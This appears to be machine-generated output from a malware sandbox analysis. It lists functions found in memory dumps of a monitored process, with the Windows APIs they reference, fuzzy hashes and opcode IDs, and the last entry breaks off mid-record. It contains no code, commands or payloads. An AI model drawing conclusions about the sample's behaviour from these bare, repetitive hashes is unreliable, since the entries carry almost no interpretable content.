Uniqueness Score: -1.00%

Function 0667D4BC, Relevance: 3.5, APIs: 2, Instructions: 507libraryCOMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 0667D972
LdrInitializeThunk.NTDLL ref: 0667DDBF

Memory Dump Source

Source File: 00000003.00000002.480950695.0000000006670000.00000040.00000001.sdmp, Offset: 06670000, based on PE: false

Similarity

API ID: DispatcherExceptionInitializeThunkUser
String ID:
API String ID: 243558500-0
Opcode ID: 678023a84c3f542450d5f594ef6db9e8359f12eacc131c233cf5a88d8a5a1189
Instruction ID: d52b048e40764b11fc4e220ccc743d9f3593e88418b3e18ebd68879c25b7a72e
Opcode Fuzzy Hash: 678023a84c3f542450d5f594ef6db9e8359f12eacc131c233cf5a88d8a5a1189
Instruction Fuzzy Hash: B3320AB4A01229CFDBA4DF70D89869DB7B6FF88205F5044EAD50AA3744DB349E85CF60

Uniqueness

Uniqueness Score: -1.00%

Function 0667D501, Relevance: 3.5, APIs: 2, Instructions: 498libraryCOMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 0667D972
LdrInitializeThunk.NTDLL ref: 0667DDBF

Memory Dump Source

Source File: 00000003.00000002.480950695.0000000006670000.00000040.00000001.sdmp, Offset: 06670000, based on PE: false

Similarity

API ID: DispatcherExceptionInitializeThunkUser
String ID:
API String ID: 243558500-0
Opcode ID: 5b1fa77aea14e31fe00bc0ef92eae2d14d450aa45240476920cd63fa1fc72c2d
Instruction ID: 1f5c132da677de75ef385e9408ddbbc4de61652f8e00e32fc7bc12588f75748b
Opcode Fuzzy Hash: 5b1fa77aea14e31fe00bc0ef92eae2d14d450aa45240476920cd63fa1fc72c2d
Instruction Fuzzy Hash: A63219B4A01229CFCBA4DF70D89869DB7B6FF88205F5044EAD50AA3744DB349E85CF60

Uniqueness

Uniqueness Score: -1.00%

Function 0667D53D, Relevance: 3.5, APIs: 2, Instructions: 493libraryCOMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 0667D972
LdrInitializeThunk.NTDLL ref: 0667DDBF

Memory Dump Source

Source File: 00000003.00000002.480950695.0000000006670000.00000040.00000001.sdmp, Offset: 06670000, based on PE: false

Similarity

API ID: DispatcherExceptionInitializeThunkUser
String ID:
API String ID: 243558500-0
Opcode ID: ae72367e2f5f52ee2e3e5b043bc22615498a96f42728530541c9fe08b0b1fd6f
Instruction ID: ade00918bbcf6b5b1f59891724e32016e11c80faeb8827c8d4a6b6c416c5087c
Opcode Fuzzy Hash: ae72367e2f5f52ee2e3e5b043bc22615498a96f42728530541c9fe08b0b1fd6f
Instruction Fuzzy Hash: 2A3209B4A01229CFCBA4DF70D89869DB7B6FF88205F5044EAD50AA3744DB349E85CF64

Uniqueness

Uniqueness Score: -1.00%

Function 0667D582, Relevance: 3.5, APIs: 2, Instructions: 486libraryCOMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 0667D972
LdrInitializeThunk.NTDLL ref: 0667DDBF

Memory Dump Source

Source File: 00000003.00000002.480950695.0000000006670000.00000040.00000001.sdmp, Offset: 06670000, based on PE: false

Similarity

API ID: DispatcherExceptionInitializeThunkUser
String ID:
API String ID: 243558500-0
Opcode ID: a0d87b84b5cb974fb95abec62bec1fab829eddc6c2ecbabe619d941c667c32df
Instruction ID: 705f4219b9dcc533e06037db02dd7a8ac91974a96566a239765ea8862e05165d
Opcode Fuzzy Hash: a0d87b84b5cb974fb95abec62bec1fab829eddc6c2ecbabe619d941c667c32df
Instruction Fuzzy Hash: 3A32F9B4A01229CFCB64DF70D89869DB7B6FF88205F5084EAD50AA3744DB349E85CF64

Uniqueness

Uniqueness Score: -1.00%

Function 0667D5C7, Relevance: 3.5, APIs: 2, Instructions: 479libraryCOMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 0667D972
LdrInitializeThunk.NTDLL ref: 0667DDBF

Memory Dump Source

Source File: 00000003.00000002.480950695.0000000006670000.00000040.00000001.sdmp, Offset: 06670000, based on PE: false

Similarity

API ID: DispatcherExceptionInitializeThunkUser
String ID:
API String ID: 243558500-0
Opcode ID: 466509636a2c8314b8e2ee7892b4a06f5a74a52463ce81c5d203468e687d1661
Instruction ID: 4610e000273f89b1c6f321806a852dd5f55944eaa74642abb5a3ec708a79d0b1
Opcode Fuzzy Hash: 466509636a2c8314b8e2ee7892b4a06f5a74a52463ce81c5d203468e687d1661
Instruction Fuzzy Hash: 332209B4A01229CFCB64DF70D89869DB7B6FF88205F5084EAD50AA3744DB349E85CF64

Uniqueness

Uniqueness Score: -1.00%

Function 0667D60C, Relevance: 3.5, APIs: 2, Instructions: 472libraryCOMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 0667D972
LdrInitializeThunk.NTDLL ref: 0667DDBF

Memory Dump Source

Source File: 00000003.00000002.480950695.0000000006670000.00000040.00000001.sdmp, Offset: 06670000, based on PE: false

Similarity

API ID: DispatcherExceptionInitializeThunkUser
String ID:
API String ID: 243558500-0
Opcode ID: 6d5c4967095a146ee187cbbd4d7c4b97e9bc35276ccf95d83d2783c959c47f9a
Instruction ID: 009626c0fe137636629c9fc1f4c11effa55cdc3ac38fa464852ed8023acc41bf
Opcode Fuzzy Hash: 6d5c4967095a146ee187cbbd4d7c4b97e9bc35276ccf95d83d2783c959c47f9a
Instruction Fuzzy Hash: 9222F8B4A01229CFCB64DF70D89869DB7B6FF88205F5084EAD50AA3744DB349E85CF64

Uniqueness

Uniqueness Score: -1.00%

Function 0667D651, Relevance: 3.5, APIs: 2, Instructions: 465libraryCOMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 0667D972
LdrInitializeThunk.NTDLL ref: 0667DDBF

Memory Dump Source

Source File: 00000003.00000002.480950695.0000000006670000.00000040.00000001.sdmp, Offset: 06670000, based on PE: false

Similarity

API ID: DispatcherExceptionInitializeThunkUser
String ID:
API String ID: 243558500-0
Opcode ID: 7a4ef053ec2bd14d50ef5356f65f06a06e7caeed9160c22ad5f993e2cbf33ab6
Instruction ID: 9dd40b3064398394b5c62bd2220bc04eded188966cbde7240dc0526db9e2eef2
Opcode Fuzzy Hash: 7a4ef053ec2bd14d50ef5356f65f06a06e7caeed9160c22ad5f993e2cbf33ab6
Instruction Fuzzy Hash: 1D22F8B4A01229CFCB64DF70D89869DB7B6FF88205F5084E9D50AA3744DB349E85CF64

Uniqueness

Uniqueness Score: -1.00%

Function 0667D696, Relevance: 3.5, APIs: 2, Instructions: 456libraryCOMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 0667D972
LdrInitializeThunk.NTDLL ref: 0667DDBF

Memory Dump Source

Source File: 00000003.00000002.480950695.0000000006670000.00000040.00000001.sdmp, Offset: 06670000, based on PE: false

Similarity

API ID: DispatcherExceptionInitializeThunkUser
String ID:
API String ID: 243558500-0
Opcode ID: cd40563654ed27a7876ea7361c6956da0c9212167a89fc07e2e5be7008394d09
Instruction ID: ae0c0327033171ac1dc6c949fe080f6d5fdd41949919a82d3347f20828b9c92c
Opcode Fuzzy Hash: cd40563654ed27a7876ea7361c6956da0c9212167a89fc07e2e5be7008394d09
Instruction Fuzzy Hash: D022F8B4A01229CFCB64DF70D89869DB7B6FF88205F5084E9D60AA3744DB349E85CF64

Uniqueness

Uniqueness Score: -1.00%

Function 0667D6D2, Relevance: 3.5, APIs: 2, Instructions: 451libraryCOMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 0667D972
LdrInitializeThunk.NTDLL ref: 0667DDBF

Memory Dump Source

Source File: 00000003.00000002.480950695.0000000006670000.00000040.00000001.sdmp, Offset: 06670000, based on PE: false

Similarity

API ID: DispatcherExceptionInitializeThunkUser
String ID:
API String ID: 243558500-0
Opcode ID: c8a95cfa5276a7a8dd98a7611f7f92de5a85ad21e73055f590546bb14d9a2907
Instruction ID: 20707a222ba9a2759efa1dee1b407d982f64c663491a2e4ac8125bbe5cbd3881
Opcode Fuzzy Hash: c8a95cfa5276a7a8dd98a7611f7f92de5a85ad21e73055f590546bb14d9a2907
Instruction Fuzzy Hash: B52207B4A01229CFCB64DF70D89869DB7B6FF88205F5085E9D60AA3344DB349E85CF64

Uniqueness

Uniqueness Score: -1.00%

Function 0667D717, Relevance: 3.4, APIs: 2, Instructions: 444libraryCOMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 0667D972
LdrInitializeThunk.NTDLL ref: 0667DDBF

Memory Dump Source

Source File: 00000003.00000002.480950695.0000000006670000.00000040.00000001.sdmp, Offset: 06670000, based on PE: false

Similarity

API ID: DispatcherExceptionInitializeThunkUser
String ID:
API String ID: 243558500-0
Opcode ID: c382e022d4c510bd5fa170ef5bce266b6caef9af726679e1c85fa2e654770df9
Instruction ID: 2d6704667546ca05cb3095fb14baa97255587f2dea8e400a34dddf8d39039e45
Opcode Fuzzy Hash: c382e022d4c510bd5fa170ef5bce266b6caef9af726679e1c85fa2e654770df9
Instruction Fuzzy Hash: 8D22F8B4A01229CFCB64DF74D89869DB7B6FF88205F5084E9D50AA3344DB349E85CF64

Uniqueness

Uniqueness Score: -1.00%

Function 0667D75F, Relevance: 3.4, APIs: 2, Instructions: 437libraryCOMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 0667D972
LdrInitializeThunk.NTDLL ref: 0667DDBF

Memory Dump Source

Source File: 00000003.00000002.480950695.0000000006670000.00000040.00000001.sdmp, Offset: 06670000, based on PE: false

Similarity

API ID: DispatcherExceptionInitializeThunkUser
String ID:
API String ID: 243558500-0
Opcode ID: bda098511a82f984d54b39be552d670b172e10c2026cd2d5e6bc584a5a7e2340
Instruction ID: b664e52d6ba9693be1fd0af363db03543f0a18920edaedf448dab527c0a0eb39
Opcode Fuzzy Hash: bda098511a82f984d54b39be552d670b172e10c2026cd2d5e6bc584a5a7e2340
Instruction Fuzzy Hash: FF12E7B4A01229CFCB64DF74D89869DB7B6FF88205F5084E9D50AA3344DB349E85CF64

Uniqueness

Uniqueness Score: -1.00%

Function 0667D7A7, Relevance: 3.4, APIs: 2, Instructions: 428libraryCOMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 0667D972
LdrInitializeThunk.NTDLL ref: 0667DDBF

Memory Dump Source

Source File: 00000003.00000002.480950695.0000000006670000.00000040.00000001.sdmp, Offset: 06670000, based on PE: false

Similarity

API ID: DispatcherExceptionInitializeThunkUser
String ID:
API String ID: 243558500-0
Opcode ID: 38b760b98a9cf8f3b34741d405ca8df382bbc7686cbab75c4d3eea9f0a9b563d
Instruction ID: 9fa1b5072758d9f11db3fa7308ee442e06ac146a607398a8c874ec64bbeaebb6
Opcode Fuzzy Hash: 38b760b98a9cf8f3b34741d405ca8df382bbc7686cbab75c4d3eea9f0a9b563d
Instruction Fuzzy Hash: 1212E6B4A01229CFCB64DF74D898A9DB7B6FF88205F5084E9D50AA3344DB349E85CF64

Uniqueness

Uniqueness Score: -1.00%

Function 0667D7E3, Relevance: 3.4, APIs: 2, Instructions: 423libraryCOMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 0667D972
LdrInitializeThunk.NTDLL ref: 0667DDBF

Memory Dump Source

Source File: 00000003.00000002.480950695.0000000006670000.00000040.00000001.sdmp, Offset: 06670000, based on PE: false

Similarity

API ID: DispatcherExceptionInitializeThunkUser
String ID:
API String ID: 243558500-0
Opcode ID: 3e27f204ddfed3fe09f81f6ed873f51061054f47ee3afbc8c7c38195827bb30e
Instruction ID: fa2b288fde7aaeea461764ade2bb86f7e92e60e207cf54301272337305d73ec5
Opcode Fuzzy Hash: 3e27f204ddfed3fe09f81f6ed873f51061054f47ee3afbc8c7c38195827bb30e
Instruction Fuzzy Hash: DD12E6B4A01229CFCB64DF74D898B9DB7B6BF88205F5084E9D50AA3344DB349E85CF64

Uniqueness

Uniqueness Score: -1.00%

Function 0667D82B, Relevance: 3.4, APIs: 2, Instructions: 416libraryCOMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 0667D972
LdrInitializeThunk.NTDLL ref: 0667DDBF

Memory Dump Source

Source File: 00000003.00000002.480950695.0000000006670000.00000040.00000001.sdmp, Offset: 06670000, based on PE: false

Similarity

API ID: DispatcherExceptionInitializeThunkUser
String ID:
API String ID: 243558500-0
Opcode ID: d87eb99adaf5ceb8e42b701eae5edf8f6e84d11ad5765ad46239a233ede71b63
Instruction ID: 2c5a5b97b854888a5ce2d83512538527170f3dfd0ab239625fb4e70dc3ce9c32
Opcode Fuzzy Hash: d87eb99adaf5ceb8e42b701eae5edf8f6e84d11ad5765ad46239a233ede71b63
Instruction Fuzzy Hash: 4F12E6B4A01229CFCB64DF74D898B9DB7B6BF88205F5084E9D50AA3344DB349E85CF64

Uniqueness

Uniqueness Score: -1.00%

Function 0667D873, Relevance: 3.4, APIs: 2, Instructions: 409libraryCOMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 0667D972
LdrInitializeThunk.NTDLL ref: 0667DDBF

Memory Dump Source

Source File: 00000003.00000002.480950695.0000000006670000.00000040.00000001.sdmp, Offset: 06670000, based on PE: false

Similarity

API ID: DispatcherExceptionInitializeThunkUser
String ID:
API String ID: 243558500-0
Opcode ID: 3368ea8c40017d5c4b599765139017f70fbba7d015318c809f0eead0016b71d8
Instruction ID: 8b0de1b6a46431ab88c11e57557796eef2c8af02225504e5619b60972514a42b
Opcode Fuzzy Hash: 3368ea8c40017d5c4b599765139017f70fbba7d015318c809f0eead0016b71d8
Instruction Fuzzy Hash: 4812E7B4A01229CFCB64DF74D898B9DB7B6BF88205F5084E9D50AA3344DB349E85CF64

Uniqueness

Uniqueness Score: -1.00%

Function 0667D8BB, Relevance: 3.4, APIs: 2, Instructions: 402libraryCOMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 0667D972
LdrInitializeThunk.NTDLL ref: 0667DDBF

Memory Dump Source

Source File: 00000003.00000002.480950695.0000000006670000.00000040.00000001.sdmp, Offset: 06670000, based on PE: false

Similarity

API ID: DispatcherExceptionInitializeThunkUser
String ID:
API String ID: 243558500-0
Opcode ID: 0f247b9c24bac7d0107fb554be45cadbb824074ccbdb79c60f069f47833bde0b
Instruction ID: 4f5ddda13221947bf7c70b8f97ec67144c83facf993786afa6ae179b13d1d417
Opcode Fuzzy Hash: 0f247b9c24bac7d0107fb554be45cadbb824074ccbdb79c60f069f47833bde0b
Instruction Fuzzy Hash: BA02E8B4A01229CFCB64DF74D898B9DB7B6BF88205F5084E9D50AA3344DB349E85CF64

Uniqueness

Uniqueness Score: -1.00%

Function 0667D903, Relevance: 3.4, APIs: 2, Instructions: 395libraryCOMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 0667D972
LdrInitializeThunk.NTDLL ref: 0667DDBF

Memory Dump Source

Source File: 00000003.00000002.480950695.0000000006670000.00000040.00000001.sdmp, Offset: 06670000, based on PE: false

Similarity

API ID: DispatcherExceptionInitializeThunkUser
String ID:
API String ID: 243558500-0
Opcode ID: cb54eb6839efbc022b0394491f0a9b89c384ba360e977bccf04c7225cdd49225
Instruction ID: 2b4d8fc0b7ba8da3080d94d70fee0f96a70150d6456832cac0ecc3597ba091cc
Opcode Fuzzy Hash: cb54eb6839efbc022b0394491f0a9b89c384ba360e977bccf04c7225cdd49225
Instruction Fuzzy Hash: E902E9B4A01229CFCB64DF74D89879DB7B6BF88205F5084E9D50AA3344DB349E85CF64

Uniqueness

Uniqueness Score: -1.00%

Function 0667D94B, Relevance: 3.4, APIs: 2, Instructions: 388libraryCOMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 0667D972
LdrInitializeThunk.NTDLL ref: 0667DDBF

Memory Dump Source

Source File: 00000003.00000002.480950695.0000000006670000.00000040.00000001.sdmp, Offset: 06670000, based on PE: false

Similarity

API ID: DispatcherExceptionInitializeThunkUser
String ID:
API String ID: 243558500-0
Opcode ID: 2fec1aabc8bd27f04cf30c78ee90585594bb18d35c7fcee24911f83fd14d22a0
Instruction ID: 56932c48b25e78ee4fd0f323510ff361a4f6d5dc1a8a8ae0f6c6247f8225473e
Opcode Fuzzy Hash: 2fec1aabc8bd27f04cf30c78ee90585594bb18d35c7fcee24911f83fd14d22a0
Instruction Fuzzy Hash: 8502E9B4A01229CFCB64DF74D89879DB7B6BF88205F5084E9D50AA3384DB349E85CF64

Uniqueness

Uniqueness Score: -1.00%

Function 0667C590, Relevance: 2.1, APIs: 1, Instructions: 555COMMON

Download Yara Rule

APIs

MsgWaitForMultipleObjects.USER32 ref: 0667CF17

Memory Dump Source

Source File: 00000003.00000002.480950695.0000000006670000.00000040.00000001.sdmp, Offset: 06670000, based on PE: false

Similarity

API ID: MultipleObjectsWait
String ID:
API String ID: 862713236-0
Opcode ID: 2708f77000218cbf748de71d3f61da9d1e55c55c13d64c0a84fc8d081809fa04
Instruction ID: 2a5be678cced9479499e9f7f9fa38484b73e8a79b630b6cb5e7bee504eefe6c4
Opcode Fuzzy Hash: 2708f77000218cbf748de71d3f61da9d1e55c55c13d64c0a84fc8d081809fa04
Instruction Fuzzy Hash: CB420CB4A002258FCB649F24D898BEDBBB6FB89305F5045D9D90AA7384DB306F85CF54

Uniqueness

Uniqueness Score: -1.00%

Function 0667D9A9, Relevance: 1.9, APIs: 1, Instructions: 377libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0667DDBF

Memory Dump Source

Source File: 00000003.00000002.480950695.0000000006670000.00000040.00000001.sdmp, Offset: 06670000, based on PE: false

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 6fad3a2b4c8f805286a5071be4b6ff5027263e44e733c024e7a673296bbfa78f
Instruction ID: 152038e0f5d9f5f47970c2977f1ff4750d7f3c6862998c022756e991c9b54fe5
Opcode Fuzzy Hash: 6fad3a2b4c8f805286a5071be4b6ff5027263e44e733c024e7a673296bbfa78f
Instruction Fuzzy Hash: B202E9B4A01229CFCB64DF74D89879DB7B6BF88205F5084E9D50AA3384DB349E85CF64

Uniqueness

Uniqueness Score: -1.00%

Function 0667D9F1, Relevance: 1.9, APIs: 1, Instructions: 370libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0667DDBF

Memory Dump Source

Source File: 00000003.00000002.480950695.0000000006670000.00000040.00000001.sdmp, Offset: 06670000, based on PE: false

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: e45b3c2e1f4c038239b78b3b76b3b5fb114d6386ce608474c0ae52f3c3dd2c99
Instruction ID: d56a0fa3d3719e23c68d36410e4d3f92d0a84f26e44ff987f378a78f065dc212
Opcode Fuzzy Hash: e45b3c2e1f4c038239b78b3b76b3b5fb114d6386ce608474c0ae52f3c3dd2c99
Instruction Fuzzy Hash: 08F1EA74A01229CFCB64DF74D89879DB7B6BF88205F5084E9D50AA3384DB349E85CF64

Uniqueness

Uniqueness Score: -1.00%

Function 0667DA39, Relevance: 1.9, APIs: 1, Instructions: 363libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0667DDBF

Memory Dump Source

Source File: 00000003.00000002.480950695.0000000006670000.00000040.00000001.sdmp, Offset: 06670000, based on PE: false

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 6aa4ac8cbed4f63c3dd4f6fb26fdb71e3f7064c9969a62835bdaacdc59dd899a
Instruction ID: 006973b308d78a7aac46a367081201e50ea7da9299c9ccfd76d9e9adfc24335c
Opcode Fuzzy Hash: 6aa4ac8cbed4f63c3dd4f6fb26fdb71e3f7064c9969a62835bdaacdc59dd899a
Instruction Fuzzy Hash: BCF1E974A01229CFCB64DF74D898B9DB7B6BF88205F5084E9D50AA3384DB349E85CF64

Uniqueness

Uniqueness Score: -1.00%

Function 0667DA81, Relevance: 1.9, APIs: 1, Instructions: 356libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0667DDBF

Memory Dump Source

Source File: 00000003.00000002.480950695.0000000006670000.00000040.00000001.sdmp, Offset: 06670000, based on PE: false

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: d557744b65b3b78cffb42264e1d734fa002df110e2bce1adea90ba771eb07299
Instruction ID: 5361ff6b1f45990d7b5f049f7c630d941b3b2750fb893b37ffcbacc01540dc12
Opcode Fuzzy Hash: d557744b65b3b78cffb42264e1d734fa002df110e2bce1adea90ba771eb07299
Instruction Fuzzy Hash: 55F1D874A01229CFCB64DB74D898B9DB7B6BF88205F5084E9D50AA3384DB349E85CF64

Uniqueness

Uniqueness Score: -1.00%

Function 0667DAC9, Relevance: 1.8, APIs: 1, Instructions: 349libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0667DDBF

Memory Dump Source

Source File: 00000003.00000002.480950695.0000000006670000.00000040.00000001.sdmp, Offset: 06670000, based on PE: false

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 2d7100d34002fb802fdaf139421467cd13e23e525020d344aaf61d88bf3d8bfe
Instruction ID: 868e96a4aed25a6d0550720eecedacbcd5ab0fad087a743da7b6c577a658ca8c
Opcode Fuzzy Hash: 2d7100d34002fb802fdaf139421467cd13e23e525020d344aaf61d88bf3d8bfe
Instruction Fuzzy Hash: 40F1D774A01229CFCB649B74D898B9DB7B6FF88205F5084E9D50AA3384DB349E85CF64

Uniqueness

Uniqueness Score: -1.00%

Function 0667DB11, Relevance: 1.8, APIs: 1, Instructions: 340libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0667DDBF

Memory Dump Source

Source File: 00000003.00000002.480950695.0000000006670000.00000040.00000001.sdmp, Offset: 06670000, based on PE: false

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: b4309e706dd17b9e80eaba97a146fbd87fc2a375703088c0fa3db70f2939cfef
Instruction ID: 0e2e2cfcdfecd4eb0d5bbd488dbf2279a6b5a27d1c9b65f4f7baa8d45df7d2c8
Opcode Fuzzy Hash: b4309e706dd17b9e80eaba97a146fbd87fc2a375703088c0fa3db70f2939cfef
Instruction Fuzzy Hash: 38E1E874A01229CFCB649B74D898B9DB7B6FF88205F5084E9D50AE3384DB349E85CF64

Uniqueness

Uniqueness Score: -1.00%

Function 0667DB4D, Relevance: 1.8, APIs: 1, Instructions: 335libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0667DDBF

Memory Dump Source

Source File: 00000003.00000002.480950695.0000000006670000.00000040.00000001.sdmp, Offset: 06670000, based on PE: false

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 5e050e4175774db64cbca838b3d59ed12f6de25ec169def1a070c66ef65a667a
Instruction ID: 5df5666f1b4ce684f6dd53c31c8206d8ca7b9330f8e4a3788ff394dc83ca9ec4
Opcode Fuzzy Hash: 5e050e4175774db64cbca838b3d59ed12f6de25ec169def1a070c66ef65a667a
Instruction Fuzzy Hash: 4EE1F874A01229CFCB649B74D898B9DB7B6FF88205F5084E9D50AE3394DB349E85CF60

Uniqueness

Uniqueness Score: -1.00%

Function 0667DB95, Relevance: 1.8, APIs: 1, Instructions: 328libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0667DDBF

Memory Dump Source

Source File: 00000003.00000002.480950695.0000000006670000.00000040.00000001.sdmp, Offset: 06670000, based on PE: false

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 0c8863f341e5cc52941e469c7860bb61e9f90b1790305715d9da8ebb69166ad0
Instruction ID: 388aee293a96b2dd86168daee53b476a651c338ac817771cc690c5b758b4bfd2
Opcode Fuzzy Hash: 0c8863f341e5cc52941e469c7860bb61e9f90b1790305715d9da8ebb69166ad0
Instruction Fuzzy Hash: 76E1EA74A01229CFCB649B74D898B9DB7B6EF88205F5084E9D50AD3384DB349E85CF60

Uniqueness

Uniqueness Score: -1.00%

Function 0667DBDD, Relevance: 1.8, APIs: 1, Instructions: 321libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0667DDBF

Memory Dump Source

Source File: 00000003.00000002.480950695.0000000006670000.00000040.00000001.sdmp, Offset: 06670000, based on PE: false

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: c6ebde7fac38df8f40f58b2cd4708225ac41acdbfa2575612d3d9c722d74e5e5
Instruction ID: 7b435f0dfa07874c231fab8fc283deac8f30f5aa9fe4378897becadb39df1168
Opcode Fuzzy Hash: c6ebde7fac38df8f40f58b2cd4708225ac41acdbfa2575612d3d9c722d74e5e5
Instruction Fuzzy Hash: F5E1D974A01229CFCB649B74D898B9DB7B6FF88205F5084E9D50AE3394DB349E85CF60

Uniqueness

Uniqueness Score: -1.00%

Function 0667DC25, Relevance: 1.8, APIs: 1, Instructions: 314libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0667DDBF

Memory Dump Source

Source File: 00000003.00000002.480950695.0000000006670000.00000040.00000001.sdmp, Offset: 06670000, based on PE: false

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: eedab227a2b60e066a0949a9959bb8c0f1ef4592119f94d59d2d54d0b2d6c496
Instruction ID: b2ed0f3020c48192e698490bebed97621f590a8d4c4bc2106a3515173a3520e4
Opcode Fuzzy Hash: eedab227a2b60e066a0949a9959bb8c0f1ef4592119f94d59d2d54d0b2d6c496
Instruction Fuzzy Hash: F0D1CA74A01229CFCB749B74D898B9DB7B6EF88205F5084E9D50AE3394DB349E85CF60

Uniqueness

Uniqueness Score: -1.00%

Function 0667DC6D, Relevance: 1.8, APIs: 1, Instructions: 307libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0667DDBF

Memory Dump Source

Source File: 00000003.00000002.480950695.0000000006670000.00000040.00000001.sdmp, Offset: 06670000, based on PE: false

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 4541218b219022a0400a899a33866437600abca0dd84ef24359655184268e98e
Instruction ID: c2cf3414e4be3ba31687bcb491242995f56794b53a34ccbf96df905dd7e8155b
Opcode Fuzzy Hash: 4541218b219022a0400a899a33866437600abca0dd84ef24359655184268e98e
Instruction Fuzzy Hash: 72D1DB74A01229CFCB749B74D898B9DB7B6EF88205F5084E9D50AD3394DB349E85CF50

Uniqueness

Uniqueness Score: -1.00%

Function 031F500F, Relevance: 1.7, APIs: 1, Instructions: 170COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.474795171.00000000031F0000.00000040.00000001.sdmp, Offset: 031F0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: df5a45be2eeee16d1929809026de6fccd1a54ab1d57187f0d7a52726508c6ab4
Instruction ID: f629321731f04fa2ff42fb88995c156085d225e124d6209b28648d8a4860c9eb
Opcode Fuzzy Hash: df5a45be2eeee16d1929809026de6fccd1a54ab1d57187f0d7a52726508c6ab4
Instruction Fuzzy Hash: 466125B1C04349AFDF12CFA9C884ADDBFB6BF49304F19815AE908AB221D771A855CF51

Uniqueness

Uniqueness Score: -1.00%

Function 0667BEEF, Relevance: 1.6, APIs: 1, Instructions: 150COMMON

Download Yara Rule

APIs

MoveFileExW.KERNEL32(?,00000000,?,?), ref: 0667C030

Memory Dump Source

Source File: 00000003.00000002.480950695.0000000006670000.00000040.00000001.sdmp, Offset: 06670000, based on PE: false

Similarity

API ID: FileMove
String ID:
API String ID: 3562171763-0
Opcode ID: 71c522e0e50efc28a9b2da47039fec3c5b6e4c138ccf176a97955204e9a0d93b
Instruction ID: f210a86163397e03b702bc72771f41098f4be28b47acf2b27850f39f53d602bf
Opcode Fuzzy Hash: 71c522e0e50efc28a9b2da47039fec3c5b6e4c138ccf176a97955204e9a0d93b
Instruction Fuzzy Hash: 1E51F575E053489FCB50CFA9D840B9ABBF5EF8A310F1580AAE944EB341D7398904CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 0667B4EC, Relevance: 1.6, APIs: 1, Instructions: 136COMMON

Download Yara Rule

APIs

GetUserNameW.ADVAPI32(00000000,00000000), ref: 0667B633

Memory Dump Source

Source File: 00000003.00000002.480950695.0000000006670000.00000040.00000001.sdmp, Offset: 06670000, based on PE: false

Similarity

API ID: NameUser
String ID:
API String ID: 2645101109-0
Opcode ID: 8e520b8ec0ed3f257da57fd6dd295e253fe9745a24fc1a4312f5f7d98ec6012c
Instruction ID: bf8aecffc13a2a97109fd3ea1de46e5828b47b5cc0a09b2f3b81f2d3697c4db1
Opcode Fuzzy Hash: 8e520b8ec0ed3f257da57fd6dd295e253fe9745a24fc1a4312f5f7d98ec6012c
Instruction Fuzzy Hash: F85102B0D102588FEB14CFAAD888BDDBBB1BF48314F15852AE815AB351DB74A844CF91

Uniqueness

Uniqueness Score: -1.00%

Function 0667921C, Relevance: 1.6, APIs: 1, Instructions: 134COMMON

Download Yara Rule

APIs

GetUserNameW.ADVAPI32(00000000,00000000), ref: 0667B633

Memory Dump Source

Source File: 00000003.00000002.480950695.0000000006670000.00000040.00000001.sdmp, Offset: 06670000, based on PE: false

Similarity

API ID: NameUser
String ID:
API String ID: 2645101109-0
Opcode ID: cc18ac4ab2638735f7142667f7dd119d41c8505362bf110dae7f939585fbc227
Instruction ID: 314ad33c942694c3bdded50fd9336b5eccddee291b68b3e865311c7c74ebe7c8
Opcode Fuzzy Hash: cc18ac4ab2638735f7142667f7dd119d41c8505362bf110dae7f939585fbc227
